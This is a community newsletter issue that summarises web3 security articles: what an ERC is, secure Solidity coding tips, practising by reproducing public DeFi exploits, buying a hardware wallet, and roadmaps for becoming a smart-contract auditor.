🥃 Distilled #2: Writing an ERC, Auditooor Grindset, and More

By: jtriley.eth - Article Link

First off, a good question is: What is an ERC?

An Ethereum Request for Comment (ERC) is a formal proposal or standardisation document that outlines a specific improvement or extension for the Ethereum blockchain. ERCs allow the Ethereum community to discuss, design, and implement new features, functionalities, or protocols within the Ethereum ecosystem.

- Yap Global

Understanding the ERC process and the guiding thoughts behind everyone who is involved in the process is massively helpful not only for devs but for security researchers as well. These are the building blocks of the Ethereum blockchain so it's great to not only deeply understand the blocks themselves, but the processes surrounding them. I don't want to over-summarize the article because it involves a lot of good (and entertaining) information. Give it a read!

By: 0xjuaan - Article Link

Safer code is always the goal, and 0xjuaan has laid out some great tips on how to achieve this goal. Most languages have guides laying out best practices, patterns, anti-patterns, etc. and the same goes for Solidity. Some developer shops are more opinionated than others, but a lot of them have come to the same conclusions for writing secure solidity reliably.

The article goes over things to be aware of when:

• Using external libraries

• Writing tests

• Writing code

And essentially what the overall goal is for the codebase is:

• Don't skip integration tests. You need 100% coverage for your integration tests. Ensuring integration test coverage and unit test coverage match up is important as well, because if the logic breaks for one of them, you know there's more to be looked into before proceeding with development.

• Reduce the overall amount of code without making it unreadable or hard to understand.

• Deeply understand any external libraries that are being used. This isn't just a random import library import in a backwater Python repo, you never know what extra functions an external library may have unless you read it.

A little "gift" from nisedo was included at the end of the article:

By: chrisdior.eth - Link

Practice makes perfect -- everyone has heard this saying before, and it stands true for understanding vulnerabilities and programming (in any language). There are multiple "views" that can be seen from a language perspective, and practicing different things involving them can upskill you in a specific area of that language. Seeing a language such as golang from a backend devs' perspective who works on microservices every day is a very different view from that of an application security engineer that reviews golang code for security flaws every day. It can be seen kind of like a difficulty chart from HackTheBox. Some people have more experience in certain areas like security, where others might be amazing at a skill like gas optimization.

Chris's tweet does a great job walking you through how to up skill your solidity programming by practicing attacks. Read his post to go more in-depth, but essentially you need to:

1. Gather info. Stay up to date on the latest DeFi hacks by being active on Twitter and Telegram.

2. Debug the transaction. Solidity exploits will be public since they occur on-chain, so they're open for anyone to analyze.

3. Analyze the exploit. Same as before, this occurred on-chain so just walk through it. If it's too advanced and you find yourself struggling, search around or wait for another security researcher to publish an analysis and see what they found and analyze how they found it.

4. Reproduce. This is key and completes your "exercise". Write up any notes you have on it and include any interesting results in your own methodology.

I will also always encourage posting your notes and analysis, but this is not a requirement.

By: alp1n3.eth

Recently Ledger had a killer sale on Amazon ($67) and I hadn't gotten a hardware wallet yet, so I picked on up! I basically needed to, especially after taking BoringSecDAO's Security 101 course. If you have any amount of money or NFTs, you need to have a hardware wallet. Keep an eye out for a blog post going over my experience so far with setting up and using my Ledger.

By: Patrick Collins - Link

Patrick recently posted two tweets:

That's it. That's the deal. Now all you have to do is start! One of the above courses is paid, but don't feel like you "need" it, because you definitely don't. Even the course author himself (super cool guy, produces great content) has said that all of the information from his course is free and available on the internet, and that he just put it together all in one place in a specific format to aid people who wanted a specific delivery method with a guaranteed level of quality. I'll leave you with a quote on imposter syndrome:

Imposter syndrome is a thing in every field, especially when starting out. The most common thing you'll find all of the "experts" have done is grind. The best way to audit is to do audits. One thing I like to do is to take known vulnerable codebases and try to find the bugs. Then read the reports, find the bugs, then reproduce the bugs in foundry or try to write invariant tests with echidna / medusa to uncover them.

- Jeff Schroeder via Telegram

By: Stephen Tong - Link

Published back in February of 2022 this is a little bit of an older article, but it is 100% still relevant and contains some great resources and actionable advice on how to break into web3 security. The TL;DR at the top of the article says:

• It will only take 1 -> 2 weeks to get up to speed if you're already an experienced security researcher

• To do Damn Vulnerable DeFi

• Study Solidity patterns and anti-patterns

• Read some writeups

• Read other people's audit reports

In the body of the article is a ton of extra info surrounding why to start auditing smart contracts, how to, overviews of the web3 community and smart contract ecosystem, and reporting. Give it a shot and see what you gleam!

By: preslavxyz - Link

I know, I know, "another roadmap", but hear me out; more information never hurts. Just make sure as you're absorbing these that you don't get stuck in "tutorial hell" and that you keep track of where you're at. For example, there's no need to build 20 different CEXs from tutorials over and over again if you're trying to be a web3 security researcher. Build one, call it good, and move on to the next step of your own custom roadmap that you've created for yourself.

Preslavxyz was nice enough to create a roadmap based off of his experiences and release it to the public, which is awesome! I will always encourage any and all public contributions to the communities, as people are taking time out of their own days to create something for someone else, entirely for free. Not to mention this one is fresh off the press, and he's keeping it updated. As of writing this article, he's added updates to it as recently as 6 hours ago. It's really simplified, which is phenomenal and he has added his own unique spin to some of the normal suggestions, so I'd definitely check it out and see if there are any handy resources you haven't run across before.

I've taken some of the suggestions from his roadmap and incorporated them into mine, which can be found here.